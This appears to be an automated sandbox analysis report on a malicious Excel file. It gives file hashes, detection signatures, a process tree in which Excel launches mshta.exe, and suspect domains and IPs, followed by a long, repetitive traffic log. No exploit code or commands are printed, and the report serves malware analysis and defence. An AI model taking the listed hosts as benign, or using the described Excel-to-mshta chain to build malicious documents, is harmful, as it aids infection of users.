Windows Analysis Report
COTA#U00c7#U00c3O.xls

Overview

General Information

Sample name: COTA#U00c7#U00c3O.xls
renamed because original name is a hash value
Original sample name: COTAO.xls
Analysis ID: 1634262
MD5: 3f6b0fddaa94e07440a3890afc3dc99c
SHA1: 2c963eb3944bc4be5892e6ef95283e2b8b9bcaf1
SHA256: d4819f6ce1e7c5ed703e11e3ae98ebfb04abe95ac2a221bcc43696de923bdbb2
Tags: xls, user-abuse_ch
Infos:

Detection

Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 6832 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7720 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7876 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6832, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7640, ProcessName: mshta.exe
Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6832, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49700
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.8, DestinationIsIpv6: false, DestinationPort: 49700, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6832, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-10T21:34:36.141524+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49704 | 13.107.246.67 | 443 | TCP
2025-03-10T21:34:42.978888+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 13.107.246.67 | 443 | TCP
2025-03-10T21:34:43.343525+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 13.107.246.67 | 443 | TCP

AV Detection

Source: COTA#U00c7#U00c3O.xls, Virustotal: Detection: 25%
Source: COTA#U00c7#U00c3O.xls, ReversingLabs: Detection: 21%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 5.161.200.29:443 -> 192.168.2.8:49700 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.8:49702 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.8:49704 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe
Source: global traffic, DNS query: name: st3.pro
Source: global traffic, DNS query: name: link.saja.market
Source: global traffic, DNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
